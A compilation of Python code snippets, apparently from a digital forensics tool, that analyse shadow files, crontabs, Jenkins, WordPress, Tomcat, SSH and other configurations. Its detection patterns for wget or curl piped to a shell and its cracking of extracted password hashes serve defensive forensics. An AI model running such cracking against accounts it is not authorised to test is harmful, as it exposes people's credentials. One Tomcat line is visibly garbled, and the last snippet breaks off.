Exemple #1
0
 def analyse_shadow_file(self, shadow, hashes):
   """Analyses a Linux shadow file.
   Args:
     shadow (list): shadow file content (list of str).
     hashes (dict): dict of hashes to usernames
   Returns:
     Tuple(
       report_text(str): The report data
       report_priority(int): The priority of the report (0 - 100)
       summary(str): A summary of the report (used for task status)
     )
   """
   report = []
   summary = 'No weak passwords found'
   priority = Priority.LOW
   weak_passwords = bruteforce_password_hashes(shadow)
   if weak_passwords:
     priority = Priority.CRITICAL
     summary = 'Shadow file analysis found {0:n} weak password(s)'.format(
         len(weak_passwords))
     report.insert(0, fmt.heading4(fmt.bold(summary)))
     line = '{0:n} weak password(s) found:'.format(len(weak_passwords))
     report.append(fmt.bullet(fmt.bold(line)))
     for password_hash, plaintext in weak_passwords:
       line = """User '{0:s}' with password '{1:s}'""".format(
           hashes[password_hash], plaintext)
       report.append(fmt.bullet(line, level=2))
   report = '\n'.join(report)
   return (report, priority, summary)
Exemple #2
0
    def analyse_crontab(self, crontab):
        """Analyses a Cron file.

    Args:
      crontab (str): file content.

    Returns:
      Tuple(
        report_text(str): The report data
        report_priority(int): The priority of the report (0 - 100)
        summary(str): A summary of the report (used for task status)
      )
    """
        findings = []
        wget_or_curl = re.compile(r'(wget|curl)', re.IGNORECASE | re.MULTILINE)
        pipe_to_sh = re.compile(r'\|(.*)sh ', re.IGNORECASE | re.MULTILINE)
        get_piped_to_sh = re.compile(r'((wget|curl).*\|)+(.*sh)',
                                     re.IGNORECASE | re.MULTILINE)

        if re.search(get_piped_to_sh, crontab):
            findings.append(
                fmt.bullet('Remote file retrieval piped to a shell.'))
        elif re.search(wget_or_curl, crontab):
            findings.append(fmt.bullet('Remote file retrieval'))
        elif re.search(pipe_to_sh, crontab):
            findings.append(fmt.bullet('File piped to shell'))

        if findings:
            summary = 'Potentially backdoored crontab found.'
            findings.insert(0, fmt.heading4(fmt.bold(summary)))
            report = '\n'.join(findings)
            return (report, Priority.HIGH, summary)

        report = 'No issues found in crontabs'
        return (report, Priority.LOW, report)
Exemple #3
0
    def format_task_detail(self, task, show_files=False):
        """Formats a single task in detail.

    Args:
      task (dict): The task to format data for
      show_files (bool): Whether we want to print out log file paths

    Returns:
      list: Formatted task data
    """
        report = []
        saved_paths = task.get('saved_paths') or []
        status = task.get('status') or 'No task status'

        report.append(fmt.heading2(task.get('name')))
        line = '{0:s} {1:s}'.format(fmt.bold('Status:'), status)
        report.append(fmt.bullet(line))
        report.append(fmt.bullet('Task Id: {0:s}'.format(task.get('id'))))
        report.append(
            fmt.bullet('Executed on worker {0:s}'.format(
                task.get('worker_name'))))
        if task.get('report_data'):
            report.append('')
            report.append(fmt.heading3('Task Reported Data'))
            report.extend(task.get('report_data').splitlines())
        if show_files:
            report.append('')
            report.append(fmt.heading3('Saved Task Files:'))
            for path in saved_paths:
                report.append(fmt.bullet(fmt.code(path)))
            report.append('')
        return report
Exemple #4
0
    def _ProcessPartition(self, path_spec):
        """Generate RawDiskPartition from a PathSpec.

    Args:
      path_spec (dfvfs.PathSpec): dfVFS path spec.

    Returns:
      A list of strings containing partition information to add to the status
      report.
    """
        status_report = []

        location = getattr(path_spec, 'location', None)
        if location in ('/', '\\'):
            path_spec = path_spec.parent
            location = getattr(path_spec, 'location', None)
        status_report.append(fmt.heading5('{0!s}:'.format(location)))
        # APFS volumes will have a volume_index
        volume_index = getattr(path_spec, 'volume_index', None)
        if not volume_index is None:
            status_report.append(
                fmt.bullet('Volume index: {0!s}'.format(volume_index)))
        # The part_index and start_offset come from the TSK partition
        # APFS volumes will have a TSK partition as a parent
        if not getattr(path_spec, 'part_index', None):
            path_spec = path_spec.parent
        status_report.append(
            fmt.bullet('Partition index: {0!s}'.format(
                getattr(path_spec, 'part_index', None))))
        status_report.append(
            fmt.bullet('Partition offset: {0!s}'.format(
                getattr(path_spec, 'start_offset', None))))
        return status_report
Exemple #5
0
  def _AnalyzeHadoopAppRoot(self, collected_artifacts, output_dir):
    """Runs a naive AppRoot files parsing method.

    This extracts strings from the saved task file, and searches for usual
    post-compromise suspicious patterns.

    TODO: properly parse the Proto. Some documentation can be found over there:
    https://svn.apache.org/repos/asf/hadoop/common/branches/branch-0.23.7/hadoop-yarn-project/hadoop-yarn/hadoop-yarn-api/src/main/proto/yarn_protos.proto

    Args:
      collected_artifacts(list(str)): a list of paths to extracted files
      output_dir(str): The base directory the artfacts are in.

    Returns:
      Tuple(
        list(str): The report data as a list of lines
        report_priority(int): The priority of the report (0 - 100)
        summary(str): A summary of the report (used for task status)
      )
    """
    report = []
    evil_commands = []
    strings_count = 0
    priority = Priority.MEDIUM
    summary = ''
    for filepath in collected_artifacts:
      relpath = os.path.relpath(filepath, output_dir)
      command = 'strings -a "{0:s}"'.format(filepath)
      log.debug('Running command [{0:s}]'.format(command))
      proc = subprocess.Popen(
          command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
      strings_output, _ = proc.communicate()
      strings_output = codecs.decode(strings_output, 'utf-8')
      for line in strings_output.splitlines():
        strings_count += 1
        if (line.find('curl') >= 0) or (line.find('wget') >= 0):
          evil_commands.append((relpath, line))

    if evil_commands:
      msg = 'Found suspicious commands!'
      report.append(fmt.heading4(fmt.bold(msg)))
      summary = msg
      priority = Priority.CRITICAL
    else:
      msg = 'Did not find any suspicious commands.'
      report.append(fmt.heading4(msg))
      summary = msg

    for filepath, command in evil_commands:
      report.append(fmt.bullet(fmt.bold('Command:')))
      report.append(fmt.code(command))
      report.append('Found in file:')
      report.append(fmt.code(filepath))

    msg = 'Extracted {0:d} strings from {1:d} file(s)'.format(
        strings_count, len(collected_artifacts))
    report.append(fmt.bullet(msg))

    return (report, priority, summary)
Exemple #6
0
    def analyse_config(self, jupyter_config):
        """Extract security related configs from Jupyter configuration files.

    Args:
      config (str): configuration file content.

    Returns:
      Tuple(
        report_text(str): The report data
        report_priority(int): The priority of the report (0 - 100)
        summary(str): A summary of the report (used for task status)
      )
    """
        findings = []
        num_misconfigs = 0
        for line in jupyter_config.split('\n'):

            if all(x in line for x in ['disable_check_xsrf', 'True']):
                findings.append(fmt.bullet('XSRF protection is disabled.'))
                num_misconfigs += 1
                continue
            if all(x in line for x in ['allow_root', 'True']):
                findings.append(
                    fmt.bullet('Juypter Notebook allowed to run as root.'))
                num_misconfigs += 1
                continue
            if 'NotebookApp.password' in line:
                if all(x in line for x in ['required', 'False']):
                    findings.append(
                        fmt.bullet(
                            'Password is not required to access this Jupyter Notebook.'
                        ))
                    num_misconfigs += 1
                    continue
                if 'required' not in line:
                    password_hash = line.split('=')
                    if len(password_hash) > 1:
                        if password_hash[1].strip() == "''":
                            findings.append(
                                fmt.bullet(
                                    'There is no password set for this Jupyter Notebook.'
                                ))
                            num_misconfigs += 1
            if all(x in line for x in ['allow_remote_access', 'True']):
                findings.append(
                    fmt.bullet(
                        'Remote access is enabled on this Jupyter Notebook.'))
                num_misconfigs += 1
                continue

        if findings:
            summary = 'Insecure Jupyter Notebook configuration found. Total misconfigs: {}'.format(
                num_misconfigs)
            findings.insert(0, fmt.heading4(fmt.bold(summary)))
            report = '\n'.join(findings)
            return (report, Priority.HIGH, summary)

        report = 'No issues found in Jupyter Notebook  configuration.'
        return (report, Priority.LOW, report)
Exemple #7
0
    def analyze_jenkins(version, credentials, timeout=300):
        """Analyses a Jenkins configuration.

    Args:
      version (str): Version of Jenkins.
      credentials (list): of tuples with username and password hash.
      timeout (int): Time in seconds to run password bruteforcing.

    Returns:
      Tuple(
        report_text(str): The report data
        report_priority(int): The priority of the report (0 - 100)
        summary(str): A summary of the report (used for task status)
      )
    """
        report = []
        summary = ''
        priority = Priority.LOW
        credentials_registry = {
            hash: username
            for username, hash in credentials
        }

        # '3200' is "bcrypt $2*$, Blowfish (Unix)"
        weak_passwords = bruteforce_password_hashes(
            credentials_registry.keys(),
            tmp_dir=None,
            timeout=timeout,
            extra_args='-m 3200')

        if not version:
            version = 'Unknown'
        report.append(fmt.bullet('Jenkins version: {0:s}'.format(version)))

        if weak_passwords:
            priority = Priority.CRITICAL
            summary = 'Jenkins analysis found potential issues'
            report.insert(0, fmt.heading4(fmt.bold(summary)))
            line = '{0:n} weak password(s) found:'.format(len(weak_passwords))
            report.append(fmt.bullet(fmt.bold(line)))
            for password_hash, plaintext in weak_passwords:
                line = 'User "{0:s}" with password "{1:s}"'.format(
                    credentials_registry.get(password_hash), plaintext)
                report.append(fmt.bullet(line, level=2))
        elif credentials_registry or version != 'Unknown':
            summary = (
                'Jenkins version {0:s} found with {1:d} credentials, but no issues '
                'detected'.format(version, len(credentials_registry)))
            report.insert(0, fmt.heading4(summary))
            priority = Priority.MEDIUM
        else:
            summary = 'No Jenkins instance found'
            report.insert(0, fmt.heading4(summary))

        report = '\n'.join(report)
        return (report, priority, summary)
 def testFormatting(self):
     """Test text formatting."""
     self.assertEqual('**testing**', fmt.bold(self.test_string))
     self.assertEqual('# testing', fmt.heading1(self.test_string))
     self.assertEqual('## testing', fmt.heading2(self.test_string))
     self.assertEqual('### testing', fmt.heading3(self.test_string))
     self.assertEqual('#### testing', fmt.heading4(self.test_string))
     self.assertEqual('##### testing', fmt.heading5(self.test_string))
     self.assertEqual('* testing', fmt.bullet(self.test_string))
     self.assertEqual('        * testing',
                      fmt.bullet(self.test_string, level=3))
     self.assertEqual('`testing`', fmt.code(self.test_string))
Exemple #9
0
    def analyze_jenkins(version, credentials):
        """Analyses a Jenkins configuration.

    Args:
      version (str): Version of Jenkins.
      credentials (list): of tuples with username and password hash.

    Returns:
      Tuple(
        report_text(str): The report data
        report_priority(int): The priority of the report (0 - 100)
        summary(str): A summary of the report (used for task status)
      )
    """
        report = []
        summary = ''
        priority = Priority.LOW
        credentials_registry = {
            hash: username
            for username, hash in credentials
        }
        # TODO: Add timeout parameter when dynamic configuration is ready.
        # Ref: https://github.com/google/turbinia/issues/244
        weak_passwords = bruteforce_password_hashes(
            credentials_registry.keys())

        if not version:
            version = 'Unknown'
        report.append(fmt.bullet('Jenkins version: {0:s}'.format(version)))

        if weak_passwords:
            priority = Priority.CRITICAL
            summary = 'Jenkins analysis found potential issues'
            report.insert(0, fmt.heading4(fmt.bold(summary)))
            line = '{0:n} weak password(s) found:'.format(len(weak_passwords))
            report.append(fmt.bullet(fmt.bold(line)))
            for password_hash, plaintext in weak_passwords:
                line = 'User "{0:s}" with password "{1:s}"'.format(
                    credentials_registry.get(password_hash), plaintext)
                report.append(fmt.bullet(line, level=2))
        elif credentials_registry or version != 'Unknown':
            summary = (
                'Jenkins version {0:s} found with {1:d} credentials, but no issues '
                'detected'.format(version, len(credentials_registry)))
            report.insert(0, fmt.heading4(summary))
            priority = Priority.MEDIUM
        else:
            summary = 'No Jenkins instance found'
            report.insert(0, fmt.heading4(summary))

        report = '\n'.join(report)
        return (report, priority, summary)
Exemple #10
0
    def analyse_tomcat_file(self, tomcat_file):
        """Analyse a Tomcat file.

    - Search for clear text password entries in user configuration file
    - Search for .war deployment
    - Search for management control panel activity

    Args:
      tomcat_file (str): Tomcat file content.
    Returns:
      Tuple(
        report_text(str): The report data
        report_priority(int): The priority of the report (0 - 100)
        summary(str): A summary of the report (used for task status)
      )
    """
        findings = []

        tomcat_user_passwords_re = re.compile('(^.*password.*)', re.MULTILINE)
        tomcat_deploy_re = re.compile(
            '(^.*Deploying web application archive.*)', re.MULTILINE)
        tomcat_manager_activity_re = re.compile(
            '(^.*POST /manager/html/upload.*)', re.MULTILINE)

        count = 0
        for password_entry in re.findall(tomcat_user_passwords_re,
                                         tomcat_file):
            findings.append(
                fmt.bullet('Tomcat user: '******'Tomcat App Deployed: ' + deployment_entry.strip()))
            count += 1

        for mgmt_entry in re.findall(tomcat_manager_activity_re, tomcat_file):
            findings.append(
                fmt.bullet('Tomcat Management: ' + mgmt_entry.strip()))
            count += 1

        if findings:
            msg = 'Tomcat analysis found {0:d} results'.format(count)
            findings.insert(0, fmt.heading4(fmt.bold(msg)))
            report = '\n'.join(findings)
            return (report, Priority.HIGH, msg)

        report = 'No Tomcat findings to report'
        return (report, Priority.LOW, report)
Exemple #11
0
    def testPartitionEnumerationRun(self, mock_getbasepathspecs):
        """Test PartitionEnumeration task run."""
        os_path_spec = path_spec_factory.Factory.NewPathSpec(
            dfvfs_definitions.TYPE_INDICATOR_OS, location='test.dd')
        raw_path_spec = path_spec_factory.Factory.NewPathSpec(
            dfvfs_definitions.TYPE_INDICATOR_RAW, parent=os_path_spec)
        tsk_p1_spec = path_spec_factory.Factory.NewPathSpec(
            dfvfs_definitions.TYPE_INDICATOR_TSK_PARTITION,
            parent=raw_path_spec,
            location='/p1',
            part_index=2,
            start_offset=1048576)
        ntfs_spec = path_spec_factory.Factory.NewPathSpec(
            dfvfs_definitions.TYPE_INDICATOR_NTFS,
            parent=tsk_p1_spec,
            location='\\')

        tsk_p2_spec = path_spec_factory.Factory.NewPathSpec(
            dfvfs_definitions.TYPE_INDICATOR_TSK_PARTITION,
            parent=raw_path_spec,
            location='/p2',
            part_index=6,
            start_offset=11534336)
        tsk_spec = path_spec_factory.Factory.NewPathSpec(
            dfvfs_definitions.TYPE_INDICATOR_NTFS,
            parent=tsk_p2_spec,
            location='/')

        mock_getbasepathspecs.return_value = [ntfs_spec, tsk_spec]

        result = self.task.run(self.evidence, self.result)

        # Ensure run method returns a TurbiniaTaskResult instance.
        self.assertIsInstance(result, TurbiniaTaskResult)
        self.assertEqual(result.task_name, 'PartitionEnumerationTask')
        self.assertEqual(len(result.evidence), 2)
        expected_report = []
        expected_report.append(
            fmt.heading4('Found 2 partition(s) in [{0:s}]:'.format(
                self.evidence.local_path)))
        expected_report.append(fmt.heading5('/p1:'))
        expected_report.append(fmt.bullet('Partition index: 2'))
        expected_report.append(fmt.bullet('Partition offset: 1048576'))
        expected_report.append(fmt.heading5('/p2:'))
        expected_report.append(fmt.bullet('Partition index: 6'))
        expected_report.append(fmt.bullet('Partition offset: 11534336'))
        expected_report = '\n'.join(expected_report)
        self.assertEqual(result.report_data, expected_report)
Exemple #12
0
    def testPartitionEnumerationRunAPFS(self, mock_getbasepathspecs, _):
        """Test PartitionEnumeration task run on APFS."""
        self.result.setup(self.task)
        filedir = os.path.dirname(os.path.realpath(__file__))
        test_data = os.path.join(filedir, '..', '..', 'test_data', 'apfs.raw')

        test_os_path_spec = path_spec_factory.Factory.NewPathSpec(
            dfvfs_definitions.TYPE_INDICATOR_OS, location=test_data)
        test_raw_path_spec = path_spec_factory.Factory.NewPathSpec(
            dfvfs_definitions.TYPE_INDICATOR_RAW, parent=test_os_path_spec)
        test_apfs_container_path_spec = path_spec_factory.Factory.NewPathSpec(
            dfvfs_definitions.TYPE_INDICATOR_APFS_CONTAINER,
            location='/apfs1',
            volume_index=0,
            parent=test_raw_path_spec)

        mock_getbasepathspecs.return_value = [test_apfs_container_path_spec]

        result = self.task.run(self.evidence, self.result)

        # Ensure run method returns a TurbiniaTaskResult instance.
        expected_report = []
        expected_report.append(
            fmt.heading4('Found 1 partition(s) in [{0:s}]:'.format(
                self.evidence.local_path)))
        expected_report.append(fmt.heading5('/apfs1:'))
        expected_report.append(fmt.bullet('Volume index: 0'))
        expected_report = '\n'.join(expected_report)
        self.assertEqual(result.report_data, expected_report)
Exemple #13
0
    def testPartitionEnumerationRunLVM(self, mock_getbasepathspecs, _):
        """Test PartitionEnumeration task run on LVM."""
        self.result.setup(self.task)
        filedir = os.path.dirname(os.path.realpath(__file__))
        test_data = os.path.join(filedir, '..', '..', 'test_data', 'lvm.raw')

        test_os_path_spec = path_spec_factory.Factory.NewPathSpec(
            dfvfs_definitions.TYPE_INDICATOR_OS, location=test_data)
        test_raw_path_spec = path_spec_factory.Factory.NewPathSpec(
            dfvfs_definitions.TYPE_INDICATOR_RAW, parent=test_os_path_spec)
        test_lvm_path_spec = path_spec_factory.Factory.NewPathSpec(
            dfvfs_definitions.TYPE_INDICATOR_LVM,
            location='/lvm1',
            parent=test_raw_path_spec)
        test_xfs_path_spec = path_spec_factory.Factory.NewPathSpec(
            dfvfs_definitions.TYPE_INDICATOR_XFS,
            location='/',
            parent=test_lvm_path_spec)

        mock_getbasepathspecs.return_value = [test_xfs_path_spec]

        result = self.task.run(self.evidence, self.result)

        # Ensure run method returns a TurbiniaTaskResult instance.
        expected_report = []
        expected_report.append(
            fmt.heading4('Found 1 partition(s) in [{0:s}]:'.format(
                self.evidence.local_path)))
        expected_report.append(fmt.heading5('/lvm1:'))
        expected_report.append(fmt.bullet('Source evidence is a volume image'))
        expected_report = '\n'.join(expected_report)
        self.assertEqual(result.report_data, expected_report)
Exemple #14
0
  def analyse_redis_config(self, config):
    """Analyses a Redis configuration.

    Args:
      config (str): configuration file content.

    Returns:
      Tuple(
        report_text(str): The report data
        report_priority(int): The priority of the report (0 - 100)
        summary(str): A summary of the report (used for task status)
      )
    """
    findings = []
    bind_everywhere_re = re.compile(
        r'^\s*bind[\s"]*0\.0\.0\.0', re.IGNORECASE | re.MULTILINE)

    if re.search(bind_everywhere_re, config):
      findings.append(fmt.bullet('Redis listening on every IP'))

    if findings:
      summary = 'Insecure Redis configuration found.'
      findings.insert(0, fmt.heading4(fmt.bold(summary)))
      report = '\n'.join(findings)
      return (report, Priority.HIGH, summary)

    report = 'No issues found in Redis configuration'
    return (report, Priority.LOW, report)
Exemple #15
0
  def format_task(self, task, show_files=False):
    """Formats a single task in short form.

    Args:
      task (dict): The task to format data for
      show_files (bool): Whether we want to print out log file paths

    Returns:
      list: Formatted task data
    """
    report = []
    saved_paths = task.get('saved_paths') or []
    status = task.get('status') or 'No task status'
    report.append(fmt.bullet('{0:s}: {1:s}'.format(task.get('name'), status)))
    if show_files:
      for path in saved_paths:
        report.append(fmt.bullet(fmt.code(path), level=2))
      report.append('')
    return report
Exemple #16
0
    def analyze_wp_access_logs(self, config):
        """Analyses access logs containing Wordpress traffic.

    Args:
      config (str): access log file content.

    Returns:
      Tuple(
        report_text(str): The report data
        report_priority(int): The priority of the report (0 - 100)
        summary(str): A summary of the report (used for task status)
      )
    """
        report = []
        findings_summary = set()

        for log_line in config.split('\n'):

            if self.install_step_regex.search(log_line):
                line = '{0:s}: Wordpress installation successful'.format(
                    self._get_timestamp(log_line))
                report.append(fmt.bullet(line))
                findings_summary.add('install')

            match = self.theme_editor_regex.search(log_line)
            if match:
                line = '{0:s}: Wordpress theme editor edited file ({1:s})'.format(
                    self._get_timestamp(log_line), match.group('edited_file'))
                report.append(fmt.bullet(line))
                findings_summary.add('theme_edit')

        if report:
            findings_summary = ', '.join(sorted(list(findings_summary)))
            summary = 'Wordpress access logs found ({0:s})'.format(
                findings_summary)

            report.insert(0, fmt.heading4(fmt.bold(summary)))
            report_text = '\n'.join(report)
            return (report_text, Priority.HIGH, summary)

        report_text = 'No Wordpress install or theme editing found in access logs'
        return (fmt.heading4(report_text), Priority.LOW, report_text)
Exemple #17
0
  def format_worker_task(self, task):
    """Formats a single task for Worker view.

    Args:
      task (dict): The task to format data for
    Returns:
      list: Formatted task data
    """
    report = []
    report.append(
        fmt.bullet('{0:s} - {1:s}'.format(task['task_id'], task['task_name'])))
    report.append(
        fmt.bullet(
            'Last Update: {0:s}'.format(
                task['last_update'].strftime(DATETIME_FORMAT)), level=2))
    report.append(fmt.bullet('Status: {0:s}'.format(task['status']), level=2))
    report.append(
        fmt.bullet('Run Time: {0:s}'.format(str(task['run_time'])), level=2))
    report.append('')
    return report
Exemple #18
0
  def runLoki(self, result, evidence):
    log_file = os.path.join(self.output_dir, 'loki.log')
    stdout_file = os.path.join(self.output_dir, 'loki_stdout.log')
    stderr_file = os.path.join(self.output_dir, 'loki_stderr.log')

    cmd = [
        'python', '/opt/loki/loki.py', '-w', '0', '--csv', '--intense',
        '--noprocscan', '--dontwait', '--noindicator', '-l', log_file, '-p',
        evidence.local_path
    ]

    (ret, result) = self.execute(
        cmd, result, log_files=[log_file], stdout_file=stdout_file,
        stderr_file=stderr_file, cwd='/opt/loki/')

    if ret != 0:
      raise TurbiniaException('Return code: {0:d}'.format(ret))

    report = []
    summary = 'No Loki threats found'
    priority = Priority.LOW

    report_lines = []
    with open(stdout_file, 'r') as loki_report_csv:
      lokireader = csv.DictReader(
          loki_report_csv, fieldnames=['Time', 'Hostname', 'Level', 'Log'])
      for row in lokireader:
        if row['Level'] == 'ALERT':
          report_lines.append(row['Log'])

    if report_lines:
      priority = Priority.HIGH
      summary = 'Loki analysis found {0:d} alert(s)'.format(len(report_lines))
      report.insert(0, fmt.heading4(fmt.bold(summary)))
      line = '{0:n} alerts(s) found:'.format(len(report_lines))
      report.append(fmt.bullet(fmt.bold(line)))
      for line in report_lines:
        report.append(fmt.bullet(line, level=2))

    report = '\n'.join(report)
    return (report, priority, summary)
Exemple #19
0
    def testPartitionEnumerationRun(self, mock_getbasepathspecs, _):
        """Test PartitionEnumeration task run."""
        self.result.setup(self.task)
        filedir = os.path.dirname(os.path.realpath(__file__))
        test_data = os.path.join(filedir, '..', '..', 'test_data',
                                 'tsk_volume_system.raw')

        os_path_spec = path_spec_factory.Factory.NewPathSpec(
            dfvfs_definitions.TYPE_INDICATOR_OS, location=test_data)
        raw_path_spec = path_spec_factory.Factory.NewPathSpec(
            dfvfs_definitions.TYPE_INDICATOR_RAW, parent=os_path_spec)
        tsk_p2_spec = path_spec_factory.Factory.NewPathSpec(
            dfvfs_definitions.TYPE_INDICATOR_TSK_PARTITION,
            parent=raw_path_spec,
            location='/p2',
            part_index=6,
            start_offset=180224)
        tsk_spec = path_spec_factory.Factory.NewPathSpec(
            dfvfs_definitions.TYPE_INDICATOR_NTFS,
            parent=tsk_p2_spec,
            location='/')

        mock_getbasepathspecs.return_value = [tsk_spec]

        result = self.task.run(self.evidence, self.result)

        # Ensure run method returns a TurbiniaTaskResult instance.
        self.assertIsInstance(result, TurbiniaTaskResult)
        self.assertEqual(result.task_name, 'PartitionEnumerationTask')
        self.assertEqual(len(result.evidence), 1)
        expected_report = []
        expected_report.append(
            fmt.heading4('Found 1 partition(s) in [{0:s}]:'.format(
                self.evidence.local_path)))
        expected_report.append(fmt.heading5('/p2:'))
        expected_report.append(fmt.bullet('Partition index: 6'))
        expected_report.append(fmt.bullet('Partition offset: 180224'))
        expected_report.append(fmt.bullet('Partition size: 1294336'))
        expected_report = '\n'.join(expected_report)
        self.assertEqual(result.report_data, expected_report)
Exemple #20
0
    def _analyse_wordpress_creds(self, creds, hashnames, timeout=300):
        """Attempt to brute force extracted Wordpress credentials.

    Args:
        creds (list): List of strings containing raw extracted credentials
        hashnames (dict): Dict mapping hash back to username for convenience.
        timeout (int): How long to spend cracking.

    Returns:
      Tuple(
        report_text(str): The report data
        report_priority(int): The priority of the report (0 - 100)
        summary(str): A summary of the report (used for task status)
      )
    """
        report = []
        summary = 'No weak passwords found'
        priority = Priority.LOW

        # 1000 is "phpass"
        weak_passwords = bruteforce_password_hashes(
            creds,
            tmp_dir=self.tmp_dir,
            timeout=timeout,
            extra_args='--username -m 400')

        if weak_passwords:
            priority = Priority.CRITICAL
            summary = 'Wordpress analysis found {0:d} weak password(s)'.format(
                len(weak_passwords))
            report.insert(0, fmt.heading4(fmt.bold(summary)))
            line = '{0:n} weak password(s) found:'.format(len(weak_passwords))
            report.append(fmt.bullet(fmt.bold(line)))
            for password_hash, plaintext in weak_passwords:
                if password_hash in hashnames:
                    line = """User '{0:s}' with password '{1:s}'""".format(
                        hashnames[password_hash], plaintext)
                    report.append(fmt.bullet(line, level=2))
        report = '\n'.join(report)
        return (report, priority, summary)
Exemple #21
0
    def analyse_sshd_config(self, config):
        """Analyses an SSH configuration.

    Args:
      config (str): configuration file content.

    Returns:
      Tuple(
        report_text(str): The report data
        report_priority(int): The priority of the report (0 - 100)
        summary(str): A summary of the report (used for task status)
      )
    """
        findings = []
        permit_root_login_re = re.compile(
            r'^\s*PermitRootLogin\s*(yes|prohibit-password|without-password)',
            re.IGNORECASE | re.MULTILINE)
        password_authentication_re = re.compile(
            r'^\s*PasswordAuthentication[\s"]*No',
            re.IGNORECASE | re.MULTILINE)
        permit_empty_passwords_re = re.compile(
            r'^\s*PermitEmptyPasswords[\s"]*Yes', re.IGNORECASE | re.MULTILINE)

        if re.search(permit_root_login_re, config):
            findings.append(fmt.bullet('Root login enabled.'))

        if not re.search(password_authentication_re, config):
            findings.append(fmt.bullet('Password authentication enabled.'))

        if re.search(permit_empty_passwords_re, config):
            findings.append(fmt.bullet('Empty passwords permitted.'))

        if findings:
            summary = 'Insecure SSH configuration found.'
            findings.insert(0, fmt.heading4(fmt.bold(summary)))
            report = '\n'.join(findings)
            return (report, 20, summary)

        report = 'No issues found in SSH configuration'
        return (report, 60, report)
Exemple #22
0
    def analyse_shadow_file(self, shadow, hashes, timeout=300):
        """Analyses a Linux shadow file.

    Args:
      shadow (list): shadow file content (list of str).
      hashes (dict): dict of hashes to usernames
      timeout (int): Time in seconds to run password bruteforcing.

    Returns:
      Tuple(
        report_text(str): The report data
        report_priority(int): The priority of the report (0 - 100)
        summary(str): A summary of the report (used for task status)
      )
    """
        report = []
        summary = 'No weak passwords found'
        priority = Priority.LOW

        # 1800 is "sha512crypt $6$, SHA512 (Unix)"
        weak_passwords = bruteforce_password_hashes(shadow,
                                                    tmp_dir=self.tmp_dir,
                                                    timeout=timeout,
                                                    extra_args='-m 1800')

        if weak_passwords:
            priority = Priority.CRITICAL
            summary = 'Shadow file analysis found {0:n} weak password(s)'.format(
                len(weak_passwords))
            report.insert(0, fmt.heading4(fmt.bold(summary)))
            line = '{0:n} weak password(s) found:'.format(len(weak_passwords))
            report.append(fmt.bullet(fmt.bold(line)))
            for password_hash, plaintext in weak_passwords:
                line = """User '{0:s}' with password '{1:s}'""".format(
                    hashes[password_hash], plaintext)
                report.append(fmt.bullet(line, level=2))
        report = '\n'.join(report)
        return (report, priority, summary)
Exemple #23
0
    def format_task_status(self,
                           instance,
                           project,
                           region,
                           days=0,
                           task_id=None,
                           request_id=None,
                           user=None,
                           all_fields=False,
                           full_report=False,
                           priority_filter=Priority.HIGH):
        """Formats the recent history for Turbinia Tasks.

    Args:
      instance (string): The Turbinia instance name (by default the same as the
          INSTANCE_ID in the config).
      project (string): The name of the project.
      region (string): The name of the zone to execute in.
      days (int): The number of days we want history for.
      task_id (string): The Id of the task.
      request_id (string): The Id of the request we want tasks for.
      user (string): The user of the request we want tasks for.
      all_fields (bool): Include all fields for the task, including task,
          request ids and saved file paths.
      full_report (bool): Generate a full markdown report instead of just a
          summary.
      priority_filter (int): Output only a summary for Tasks with a value
          greater than the priority_filter.

    Returns:
      String of task status
    """
        if user and days == 0:
            days = 1000
        task_results = self.get_task_data(instance, project, region, days,
                                          task_id, request_id, user)
        if not task_results:
            return ''
        # Sort all tasks by the report_priority so that tasks with a higher
        # priority are listed first in the report.
        for result in task_results:
            # 0 is a valid value, so checking against specific values
            if result.get('report_priority') in (None, ''):
                result['report_priority'] = Priority.LOW
        task_results = sorted(task_results, key=itemgetter('report_priority'))
        num_results = len(task_results)
        if not num_results:
            msg = 'No Turbinia Tasks found.'
            log.info(msg)
            return '\n{0:s}'.format(msg)

        # Build up data
        report = []
        requester = task_results[0].get('requester')
        request_id = task_results[0].get('request_id')
        success_types = ['Successful', 'Failed', 'Scheduled or Running']
        success_values = [True, False, None]
        # Reverse mapping values to types
        success_map = dict(zip(success_values, success_types))
        task_map = defaultdict(list)
        success_types.insert(0, 'High Priority')
        for task in task_results:
            if task.get('report_priority') <= priority_filter:
                task_map['High Priority'].append(task)
            else:
                task_map[success_map[task.get('successful')]].append(task)

        # Generate report header
        report.append('\n')
        report.append(fmt.heading1('Turbinia report {0:s}'.format(request_id)))
        report.append(
            fmt.bullet('Processed {0:d} Tasks for user {1:s}'.format(
                num_results, requester)))

        # Print report data for tasks
        for success_type in success_types:
            report.append('')
            report.append(fmt.heading1('{0:s} Tasks'.format(success_type)))
            if not task_map[success_type]:
                report.append(fmt.bullet('None'))
            for task in task_map[success_type]:
                if full_report and success_type == success_types[0]:
                    report.extend(
                        self.format_task_detail(task, show_files=all_fields))
                else:
                    report.extend(self.format_task(task,
                                                   show_files=all_fields))

        return '\n'.join(report)
Exemple #24
0
    def _ProcessPartition(self, path_spec):
        """Generate RawDiskPartition from a PathSpec.

    Args:
      path_spec (dfvfs.PathSpec): dfVFS path spec.

    Returns:
      A new RawDiskPartition evidence item and a list of strings containing
      partition information to add to the status report.
    """
        status_report = []

        fs_path_spec = path_spec
        fs_location = None
        partition_location = None
        volume_index = None
        partition_index = None
        partition_offset = None
        partition_size = None
        lv_uuid = None

        # File system location / identifier
        is_lvm = False
        fs_location = getattr(path_spec, 'location', None)
        while path_spec.HasParent():
            type_indicator = path_spec.type_indicator
            if type_indicator == dfvfs_definitions.TYPE_INDICATOR_APFS_CONTAINER:
                # APFS volume index
                volume_index = getattr(path_spec, 'volume_index', None)

            if type_indicator in (
                    dfvfs_definitions.TYPE_INDICATOR_GPT,
                    dfvfs_definitions.TYPE_INDICATOR_LVM,
                    dfvfs_definitions.TYPE_INDICATOR_TSK_PARTITION):
                if fs_location in ('\\', '/'):
                    # Partition location / identifier
                    fs_location = getattr(path_spec, 'location', None)
                partition_location = getattr(path_spec, 'location', None)
                # Partition index
                partition_index = getattr(path_spec, 'part_index', None)

                if type_indicator == dfvfs_definitions.TYPE_INDICATOR_TSK_PARTITION:
                    volume_system = tsk_volume_system.TSKVolumeSystem()
                elif type_indicator == dfvfs_definitions.TYPE_INDICATOR_LVM:
                    is_lvm = True
                    volume_system = lvm_volume_system.LVMVolumeSystem()
                else:
                    volume_system = gpt_volume_system.GPTVolumeSystem()
                try:
                    volume_system.Open(path_spec)
                    volume_identifier = partition_location.replace('/', '')
                    volume = volume_system.GetVolumeByIdentifier(
